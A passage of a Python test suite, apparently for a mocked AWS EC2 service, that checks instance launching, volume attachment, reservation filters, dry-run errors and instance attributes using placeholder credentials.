50}},\n ],\n )\n instance = result[0]\n for volume in instance.volumes.all():\n response = instance.detach_volume(VolumeId=volume.volume_id)\n response[""State""].should.equal(""detaching"")\n\n instance.terminate()\n instance.wait_until_terminated()\n\n assert len(list(ec2_resource.volumes.all())) == 2\n\n\n@mock_ec2\ndef test_instance_detach_volume_wrong_path():\n ec2_resource = boto3.resource(""ec2"", ""us-west-1"")\n result = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n BlockDeviceMappings=[{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}},],\n )\n instance = result[0]\n for volume in instance.volumes.all():\n with pytest.raises(ClientError) as ex:\n instance.detach_volume(VolumeId=volume.volume_id, Device=""/dev/sdf"")\n\n ex.value.response[""Error""][""Code""].should.equal(""InvalidAttachment.NotFound"")\n ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)\n ex.value.response[""Error""][""Message""].should.equal(\n ""The volume {0} is not attached to instance {1} as device {2}"".format(\n volume.volume_id, instance.instance_id, ""/dev/sdf""\n )\n )\n\n\n@mock_ec2_deprecated\ndef test_terminate_empty_instances():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n conn.terminate_instances.when.called_with([]).should.throw(EC2ResponseError)\n\n\n@freeze_time(""2014-01-01 05:00:00"")\n@mock_ec2_deprecated\ndef test_instance_attach_volume():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n vol1 = conn.create_volume(size=36, zone=conn.region.name)\n vol1.attach(instance.id, ""/dev/sda1"")\n vol1.update()\n vol2 = conn.create_volume(size=65, zone=conn.region.name)\n vol2.attach(instance.id, ""/dev/sdb1"")\n vol2.update()\n vol3 = conn.create_volume(size=130, zone=conn.region.name)\n vol3.attach(instance.id, ""/dev/sdc1"")\n vol3.update()\n\n reservations = conn.get_all_reservations()\n instance = reservations[0].instances[0]\n\n instance.block_device_mapping.should.have.length_of(3)\n\n for v in conn.get_all_volumes(\n volume_ids=[instance.block_device_mapping[""/dev/sdc1""].volume_id]\n ):\n v.attach_data.instance_id.should.equal(instance.id)\n # can do due to freeze_time decorator.\n v.attach_data.attach_time.should.equal(instance.launch_time)\n # can 
do due to freeze_time decorator.\n v.create_time.should.equal(instance.launch_time)\n v.region.name.should.equal(instance.region.name)\n v.status.should.equal(""in-use"")\n\n\n@mock_ec2_deprecated\ndef test_get_instances_by_id():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)\n instance1, instance2 = reservation.instances\n\n reservations = conn.get_all_reservations(instance_ids=[instance1.id])\n reservations.should.have.length_of(1)\n reservation = reservations[0]\n reservation.instances.should.have.length_of(1)\n reservation.instances[0].id.should.equal(instance1.id)\n\n reservations = conn.get_all_reservations(instance_ids=[instance1.id, instance2.id])\n reservations.should.have.length_of(1)\n reservation = reservations[0]\n reservation.instances.should.have.length_of(2)\n instance_ids = [instance.id for instance in reservation.instances]\n instance_ids.should.equal([instance1.id, instance2.id])\n\n # Call get_all_reservations with a bad id should raise an error\n with pytest.raises(EC2ResponseError) as cm:\n conn.get_all_reservations(instance_ids=[instance1.id, ""i-1234abcd""])\n cm.value.code.should.equal(""InvalidInstanceID.NotFound"")\n cm.value.status.should.equal(400)\n cm.value.request_id.should_not.be.none\n\n\n@mock_ec2\ndef test_get_paginated_instances():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n conn = boto3.resource(""ec2"", ""us-east-1"")\n for i in range(100):\n conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)\n resp = client.describe_instances(MaxResults=50)\n reservations = resp[""Reservations""]\n reservations.should.have.length_of(50)\n next_token = resp[""NextToken""]\n next_token.should_not.be.none\n resp2 = client.describe_instances(NextToken=next_token)\n reservations.extend(resp2[""Reservations""])\n reservations.should.have.length_of(100)\n assert ""NextToken"" not in resp2.keys()\n\n\n@mock_ec2\ndef test_create_with_tags():\n ec2 = boto3.client(""ec2"", region_name=""us-west-2"")\n instances = ec2.run_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n InstanceType=""t2.micro"",\n TagSpecifications=[\n {\n ""ResourceType"": ""instance"",\n ""Tags"": [\n {""Key"": ""MY_TAG1"", ""Value"": ""MY_VALUE1""},\n {""Key"": ""MY_TAG2"", ""Value"": ""MY_VALUE2""},\n ],\n },\n {\n ""ResourceType"": ""instance"",\n ""Tags"": [{""Key"": ""MY_TAG3"", ""Value"": ""MY_VALUE3""}],\n },\n ],\n )\n assert ""Tags"" in instances[""Instances""][0]\n len(instances[""Instances""][0][""Tags""]).should.equal(3)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_state():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n\n conn.terminate_instances([instance1.id])\n\n reservations = conn.get_all_reservations(filters={""instance-state-name"": ""running""})\n reservations.should.have.length_of(1)\n # Since we terminated instance1, only instance2 and instance3 should be\n # returned\n instance_ids = [instance.id for instance in reservations[0].instances]\n set(instance_ids).should.equal(set([instance2.id, instance3.id]))\n\n reservations = conn.get_all_reservations(\n [instance2.id], filters={""instance-state-name"": ""running""}\n )\n reservations.should.have.length_of(1)\n instance_ids = [instance.id for instance in reservations[0].instances]\n instance_ids.should.equal([instance2.id])\n\n reservations = conn.get_all_reservations(\n [instance2.id], filters={""instance-state-name"": 
""terminated""}\n )\n list(reservations).should.equal([])\n\n # get_all_reservations should still return all 3\n reservations = conn.get_all_reservations()\n reservations[0].instances.should.have.length_of(3)\n\n conn.get_all_reservations.when.called_with(\n filters={""not-implemented-filter"": ""foobar""}\n ).should.throw(NotImplementedError)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_instance_id():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n\n reservations = conn.get_all_reservations(filters={""instance-id"": instance1.id})\n # get_all_reservations should return just instance1\n reservations[0].instances.should.have.length_of(1)\n reservations[0].instances[0].id.should.equal(instance1.id)\n\n reservations = conn.get_all_reservations(\n filters={""instance-id"": [instance1.id, instance2.id]}\n )\n # get_all_reservations should return two\n reservations[0].instances.should.have.length_of(2)\n\n reservations = conn.get_all_reservations(filters={""instance-id"": ""non-existing-id""})\n reservations.should.have.length_of(0)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_instance_type():\n conn = boto.connect_ec2()\n reservation1 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""m1.small"")\n instance1 = reservation1.instances[0]\n reservation2 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""m1.small"")\n instance2 = reservation2.instances[0]\n reservation3 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""t1.micro"")\n instance3 = reservation3.instances[0]\n\n reservations = conn.get_all_reservations(filters={""instance-type"": ""m1.small""})\n # get_all_reservations should return instance1,2\n reservations.should.have.length_of(2)\n reservations[0].instances.should.have.length_of(1)\n reservations[1].instances.should.have.length_of(1)\n instance_ids = [reservations[0].instances[0].id, reservations[1].instances[0].id]\n set(instance_ids).should.equal(set([instance1.id, instance2.id]))\n\n reservations = conn.get_all_reservations(filters={""instance-type"": ""t1.micro""})\n # get_all_reservations should return one\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(1)\n reservations[0].instances[0].id.should.equal(instance3.id)\n\n reservations = conn.get_all_reservations(\n filters={""instance-type"": [""t1.micro"", ""m1.small""]}\n )\n reservations.should.have.length_of(3)\n reservations[0].instances.should.have.length_of(1)\n reservations[1].instances.should.have.length_of(1)\n reservations[2].instances.should.have.length_of(1)\n instance_ids = [\n reservations[0].instances[0].id,\n reservations[1].instances[0].id,\n reservations[2].instances[0].id,\n ]\n set(instance_ids).should.equal(set([instance1.id, instance2.id, instance3.id]))\n\n reservations = conn.get_all_reservations(filters={""instance-type"": ""bogus""})\n # bogus instance-type should return none\n reservations.should.have.length_of(0)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_reason_code():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n instance1.stop()\n instance2.terminate()\n\n reservations = conn.get_all_reservations(\n filters={""state-reason-code"": ""Client.UserInitiatedShutdown""}\n )\n # get_all_reservations should return instance1 and instance2\n reservations[0].instances.should.have.length_of(2)\n 
set([instance1.id, instance2.id]).should.equal(\n set([i.id for i in reservations[0].instances])\n )\n\n reservations = conn.get_all_reservations(filters={""state-reason-code"": """"})\n # get_all_reservations should return instance 3\n reservations[0].instances.should.have.length_of(1)\n reservations[0].instances[0].id.should.equal(instance3.id)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_source_dest_check():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)\n instance1, instance2 = reservation.instances\n conn.modify_instance_attribute(\n instance1.id, attribute=""sourceDestCheck"", value=False\n )\n\n source_dest_check_false = conn.get_all_reservations(\n filters={""source-dest-check"": ""false""}\n )\n source_dest_check_true = conn.get_all_reservations(\n filters={""source-dest-check"": ""true""}\n )\n\n source_dest_check_false[0].instances.should.have.length_of(1)\n source_dest_check_false[0].instances[0].id.should.equal(instance1.id)\n\n source_dest_check_true[0].instances.should.have.length_of(1)\n source_dest_check_true[0].instances[0].id.should.equal(instance2.id)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_vpc_id():\n conn = boto.connect_vpc(""the_key"", ""the_secret"")\n vpc1 = conn.create_vpc(""10.0.0.0/16"")\n subnet1 = conn.create_subnet(vpc1.id, ""10.0.0.0/27"")\n reservation1 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet1.id)\n instance1 = reservation1.instances[0]\n\n vpc2 = conn.create_vpc(""10.1.0.0/16"")\n subnet2 = conn.create_subnet(vpc2.id, ""10.1.0.0/27"")\n reservation2 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet2.id)\n instance2 = reservation2.instances[0]\n\n reservations1 = conn.get_all_reservations(filters={""vpc-id"": vpc1.id})\n reservations1.should.have.length_of(1)\n reservations1[0].instances.should.have.length_of(1)\n reservations1[0].instances[0].id.should.equal(instance1.id)\n reservations1[0].instances[0].vpc_id.should.equal(vpc1.id)\n reservations1[0].instances[0].subnet_id.should.equal(subnet1.id)\n\n reservations2 = conn.get_all_reservations(filters={""vpc-id"": vpc2.id})\n reservations2.should.have.length_of(1)\n reservations2[0].instances.should.have.length_of(1)\n reservations2[0].instances[0].id.should.equal(instance2.id)\n reservations2[0].instances[0].vpc_id.should.equal(vpc2.id)\n reservations2[0].instances[0].subnet_id.should.equal(subnet2.id)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_architecture():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=1)\n instance = reservation.instances\n\n reservations = conn.get_all_reservations(filters={""architecture"": ""x86_64""})\n # get_all_reservations should return the instance\n reservations[0].instances.should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_image_id():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n conn = boto3.resource(""ec2"", ""us-east-1"")\n conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)\n\n reservations = client.describe_instances(\n Filters=[{""Name"": ""image-id"", ""Values"": [EXAMPLE_AMI_ID]}]\n )[""Reservations""]\n reservations[0][""Instances""].should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_account_id():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n conn = boto3.resource(""ec2"", ""us-east-1"")\n conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)\n\n reservations = 
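The deprecated-boto filter tests above have direct boto3 equivalents; a minimal sketch of the same instance-state filter in boto3 form (region is illustrative, and outside a moto mock this hits real AWS):

import boto3

client = boto3.client("ec2", region_name="us-east-1")
resp = client.describe_instances(
    Filters=[{"Name": "instance-state-name", "Values": ["running"]}]
)
# flatten reservations -> instances, as the tests do with reservation.instances
running = [i["InstanceId"]
           for r in resp["Reservations"]
           for i in r["Instances"]]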
client.describe_instances(\n Filters=[{""Name"": ""owner-id"", ""Values"": [""123456789012""]}]\n )[""Reservations""]\n\n reservations[0][""Instances""].should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_private_dns():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n conn = boto3.resource(""ec2"", ""us-east-1"")\n conn.create_instances(\n ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress=""127.0.0.1""\n )\n reservations = client.describe_instances(\n Filters=[{""Name"": ""private-dns-name"", ""Values"": [""ip-10-0-0-1.ec2.internal""]}]\n )[""Reservations""]\n reservations[0][""Instances""].should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_ni_private_dns():\n client = boto3.client(""ec2"", region_name=""us-west-2"")\n conn = boto3.resource(""ec2"", ""us-west-2"")\n conn.create_instances(\n ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress=""127.0.0.1""\n )\n reservations = client.describe_instances(\n Filters=[\n {\n ""Name"": ""network-interface.private-dns-name"",\n ""Values"": [""ip-10-0-0-1.us-west-2.compute.internal""],\n }\n ]\n )[""Reservations""]\n reservations[0][""Instances""].should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_instance_group_name():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n client.create_security_group(Description=""test"", GroupName=""test_sg"")\n client.run_instances(\n ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=[""test_sg""]\n )\n reservations = client.describe_instances(\n Filters=[{""Name"": ""instance.group-name"", ""Values"": [""test_sg""]}]\n )[""Reservations""]\n reservations[0][""Instances""].should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_instance_group_id():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n create_sg = client.create_security_group(Description=""test"", GroupName=""test_sg"")\n group_id = create_sg[""GroupId""]\n client.run_instances(\n ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=[""test_sg""]\n )\n reservations = client.describe_instances(\n Filters=[{""Name"": ""instance.group-id"", ""Values"": [group_id]}]\n )[""Reservations""]\n reservations[0][""Instances""].should.have.length_of(1)\n\n\n@mock_ec2\ndef test_get_instances_filtering_by_subnet_id():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n\n vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"")\n subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"")\n\n resp = client.create_vpc(CidrBlock=str(vpc_cidr),)\n vpc_id = resp[""Vpc""][""VpcId""]\n\n resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)\n subnet_id = resp[""Subnet""][""SubnetId""]\n\n client.run_instances(\n ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id,\n )\n\n reservations = client.describe_instances(\n Filters=[{""Name"": ""subnet-id"", ""Values"": [subnet_id]}]\n )[""Reservations""]\n reservations.should.have.length_of(1)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_tag():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n instance1.add_tag(""tag1"", ""value1"")\n instance1.add_tag(""tag2"", ""value2"")\n instance2.add_tag(""tag1"", ""value1"")\n instance2.add_tag(""tag2"", ""wrong value"")\n instance3.add_tag(""tag2"", ""value2"")\n\n reservations = conn.get_all_reservations(filters={""tag:tag0"": ""value0""})\n # 
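The tag-filter tests that follow use boto's `filters={"tag:tag1": "value1"}` form; the boto3 spelling of the same query looks like this (a sketch reusing the tests' tag1/value1 names, region illustrative):

import boto3

client = boto3.client("ec2", region_name="us-east-1")
resp = client.describe_instances(
    Filters=[{"Name": "tag:tag1", "Values": ["value1"]}]
)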
get_all_reservations should return no instances\n reservations.should.have.length_of(0)\n\n reservations = conn.get_all_reservations(filters={""tag:tag1"": ""value1""})\n # get_all_reservations should return both instances with this tag value\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(2)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance2.id)\n\n reservations = conn.get_all_reservations(\n filters={""tag:tag1"": ""value1"", ""tag:tag2"": ""value2""}\n )\n # get_all_reservations should return the instance with both tag values\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(1)\n reservations[0].instances[0].id.should.equal(instance1.id)\n\n reservations = conn.get_all_reservations(\n filters={""tag:tag1"": ""value1"", ""tag:tag2"": ""value2""}\n )\n # get_all_reservations should return the instance with both tag values\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(1)\n reservations[0].instances[0].id.should.equal(instance1.id)\n\n reservations = conn.get_all_reservations(filters={""tag:tag2"": [""value2"", ""bogus""]})\n # get_all_reservations should return both instances with one of the\n # acceptable tag values\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(2)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance3.id)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_tag_value():\n conn = boto.connect_ec2()\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n instance1.add_tag(""tag1"", ""value1"")\n instance1.add_tag(""tag2"", ""value2"")\n instance2.add_tag(""tag1"", ""value1"")\n instance2.add_tag(""tag2"", ""wrong value"")\n instance3.add_tag(""tag2"", ""value2"")\n\n reservations = conn.get_all_reservations(filters={""tag-value"": ""value0""})\n # get_all_reservations should return no instances\n reservations.should.have.length_of(0)\n\n reservations = conn.get_all_reservations(filters={""tag-value"": ""value1""})\n # get_all_reservations should return both instances with this tag value\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(2)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance2.id)\n\n reservations = conn.get_all_reservations(\n filters={""tag-value"": [""value2"", ""value1""]}\n )\n # get_all_reservations should return both instances with one of the\n # acceptable tag values\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(3)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance2.id)\n reservations[0].instances[2].id.should.equal(instance3.id)\n\n reservations = conn.get_all_reservations(filters={""tag-value"": [""value2"", ""bogus""]})\n # get_all_reservations should return both instances with one of the\n # acceptable tag values\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(2)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance3.id)\n\n\n@mock_ec2_deprecated\ndef test_get_instances_filtering_by_tag_name():\n conn = boto.connect_ec2()\n reservation = 
conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n instance1.add_tag(""tag1"")\n instance1.add_tag(""tag2"")\n instance2.add_tag(""tag1"")\n instance2.add_tag(""tag2X"")\n instance3.add_tag(""tag3"")\n\n reservations = conn.get_all_reservations(filters={""tag-key"": ""tagX""})\n # get_all_reservations should return no instances\n reservations.should.have.length_of(0)\n\n reservations = conn.get_all_reservations(filters={""tag-key"": ""tag1""})\n # get_all_reservations should return both instances with this tag value\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(2)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance2.id)\n\n reservations = conn.get_all_reservations(filters={""tag-key"": [""tag1"", ""tag3""]})\n # get_all_reservations should return both instances with one of the\n # acceptable tag values\n reservations.should.have.length_of(1)\n reservations[0].instances.should.have.length_of(3)\n reservations[0].instances[0].id.should.equal(instance1.id)\n reservations[0].instances[1].id.should.equal(instance2.id)\n reservations[0].instances[2].id.should.equal(instance3.id)\n\n\n@mock_ec2_deprecated\ndef test_instance_start_and_stop():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)\n instances = reservation.instances\n instances.should.have.length_of(2)\n\n instance_ids = [instance.id for instance in instances]\n\n with pytest.raises(EC2ResponseError) as ex:\n stopped_instances = conn.stop_instances(instance_ids, dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the StopInstance operation: Request would have succeeded, but DryRun flag is set""\n )\n\n stopped_instances = conn.stop_instances(instance_ids)\n\n for instance in stopped_instances:\n instance.state.should.equal(""stopping"")\n\n with pytest.raises(EC2ResponseError) as ex:\n started_instances = conn.start_instances([instances[0].id], dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the StartInstance operation: Request would have succeeded, but DryRun flag is set""\n )\n\n started_instances = conn.start_instances([instances[0].id])\n started_instances[0].state.should.equal(""pending"")\n\n\n@mock_ec2_deprecated\ndef test_instance_reboot():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n with pytest.raises(EC2ResponseError) as ex:\n instance.reboot(dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the RebootInstance operation: Request would have succeeded, but DryRun flag is set""\n )\n\n instance.reboot()\n instance.state.should.equal(""pending"")\n\n\n@mock_ec2_deprecated\ndef test_instance_attribute_instance_type():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n with pytest.raises(EC2ResponseError) as ex:\n instance.modify_attribute(""instanceType"", ""m1.small"", dry_run=True)\n 
ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the ModifyInstanceType operation: Request would have succeeded, but DryRun flag is set""\n )\n\n instance.modify_attribute(""instanceType"", ""m1.small"")\n\n instance_attribute = instance.get_attribute(""instanceType"")\n instance_attribute.should.be.a(InstanceAttribute)\n instance_attribute.get(""instanceType"").should.equal(""m1.small"")\n\n\n@mock_ec2_deprecated\ndef test_modify_instance_attribute_security_groups():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n sg_id = conn.create_security_group(\n ""test security group"", ""this is a test security group""\n ).id\n sg_id2 = conn.create_security_group(\n ""test security group 2"", ""this is a test security group 2""\n ).id\n\n with pytest.raises(EC2ResponseError) as ex:\n instance.modify_attribute(""groupSet"", [sg_id, sg_id2], dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set""\n )\n\n instance.modify_attribute(""groupSet"", [sg_id, sg_id2])\n\n instance_attribute = instance.get_attribute(""groupSet"")\n instance_attribute.should.be.a(InstanceAttribute)\n group_list = instance_attribute.get(""groupSet"")\n any(g.id == sg_id for g in group_list).should.be.ok\n any(g.id == sg_id2 for g in group_list).should.be.ok\n\n\n@mock_ec2_deprecated\ndef test_instance_attribute_user_data():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n with pytest.raises(EC2ResponseError) as ex:\n instance.modify_attribute(""userData"", ""this is my user data"", dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the ModifyUserData operation: Request would have succeeded, but DryRun flag is set""\n )\n\n instance.modify_attribute(""userData"", ""this is my user data"")\n\n instance_attribute = instance.get_attribute(""userData"")\n instance_attribute.should.be.a(InstanceAttribute)\n instance_attribute.get(""userData"").should.equal(""this is my user data"")\n\n\n@mock_ec2_deprecated\ndef test_instance_attribute_source_dest_check():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n # Default value is true\n instance.sourceDestCheck.should.equal(""true"")\n\n instance_attribute = instance.get_attribute(""sourceDestCheck"")\n instance_attribute.should.be.a(InstanceAttribute)\n instance_attribute.get(""sourceDestCheck"").should.equal(True)\n\n # Set to false (note: Boto converts bool to string, eg \'false\')\n\n with pytest.raises(EC2ResponseError) as ex:\n instance.modify_attribute(""sourceDestCheck"", False, dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the ModifySourceDestCheck operation: Request would have succeeded, but DryRun flag is set""\n )\n\n 
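The sourceDestCheck round-trip tested here (default true, set false, read back) can also be expressed with boto3; a hedged sketch, with a placeholder instance id:

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")
instance_id = "i-1234567890abcdef0"   # placeholder, not a real instance
ec2.modify_instance_attribute(InstanceId=instance_id,
                              SourceDestCheck={"Value": False})
attr = ec2.describe_instance_attribute(InstanceId=instance_id,
                                       Attribute="sourceDestCheck")
assert attr["SourceDestCheck"]["Value"] is False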
instance.modify_attribute(""sourceDestCheck"", False)\n\n instance.update()\n instance.sourceDestCheck.should.equal(""false"")\n\n instance_attribute = instance.get_attribute(""sourceDestCheck"")\n instance_attribute.should.be.a(InstanceAttribute)\n instance_attribute.get(""sourceDestCheck"").should.equal(False)\n\n # Set back to true\n instance.modify_attribute(""sourceDestCheck"", True)\n\n instance.update()\n instance.sourceDestCheck.should.equal(""true"")\n\n instance_attribute = instance.get_attribute(""sourceDestCheck"")\n instance_attribute.should.be.a(InstanceAttribute)\n instance_attribute.get(""sourceDestCheck"").should.equal(True)\n\n\n@mock_ec2_deprecated\ndef test_user_data_with_run_instance():\n user_data = b""some user data""\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, user_data=user_data)\n instance = reservation.instances[0]\n\n instance_attribute = instance.get_attribute(""userData"")\n instance_attribute.should.be.a(InstanceAttribute)\n retrieved_user_data = instance_attribute.get(""userData"").encode(""utf-8"")\n decoded_user_data = decode_method(retrieved_user_data)\n decoded_user_data.should.equal(b""some user data"")\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_security_group_name():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n\n with pytest.raises(EC2ResponseError) as ex:\n group = conn.create_security_group(""group1"", ""some description"", dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the CreateSecurityGroup operation: Request would have succeeded, but DryRun flag is set""\n )\n\n group = conn.create_security_group(""group1"", ""some description"")\n\n reservation = conn.run_instances(EXAMPLE_AMI_ID, security_groups=[""group1""])\n instance = reservation.instances[0]\n\n instance.groups[0].id.should.equal(group.id)\n instance.groups[0].name.should.equal(""group1"")\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_security_group_id():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n group = conn.create_security_group(""group1"", ""some description"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, security_group_ids=[group.id])\n instance = reservation.instances[0]\n\n instance.groups[0].id.should.equal(group.id)\n instance.groups[0].name.should.equal(""group1"")\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_instance_type():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""t1.micro"")\n instance = reservation.instances[0]\n\n instance.instance_type.should.equal(""t1.micro"")\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_default_placement():\n conn = boto.ec2.connect_to_region(""us-east-1"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID)\n instance = reservation.instances[0]\n\n instance.placement.should.equal(""us-east-1a"")\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_placement():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, placement=""us-east-1b"")\n instance = reservation.instances[0]\n\n instance.placement.should.equal(""us-east-1b"")\n\n\n@mock_ec2\ndef test_run_instance_with_subnet_boto3():\n client = boto3.client(""ec2"", region_name=""eu-central-1"")\n\n ip_networks = [\n (ipaddress.ip_network(""10.0.0.0/16""), ipaddress.ip_network(""10.0.99.0/24"")),\n 
